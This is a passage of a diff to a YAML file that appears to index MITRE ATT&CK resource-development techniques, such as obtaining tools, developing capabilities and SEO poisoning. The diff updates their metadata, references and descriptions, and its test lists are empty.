-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -53428,21 +54069,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -53488,17 +54155,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -53524,7 +54190,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -53556,8 +54222,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -53584,7 +54248,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -53608,8 +54272,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -53635,7 +54297,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -53669,8 +54331,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -53718,7 +54378,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -53734,7 +54394,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -53793,54 +54452,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -53851,22 +54466,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -53929,37 +54588,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -53983,11 +54643,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -54045,17 +54708,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -54063,7 +54727,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -54077,7 +54741,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54110,11 +54774,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -54136,7 +54807,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -54154,47 +54825,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54203,21 +54837,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -54257,7 +54927,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
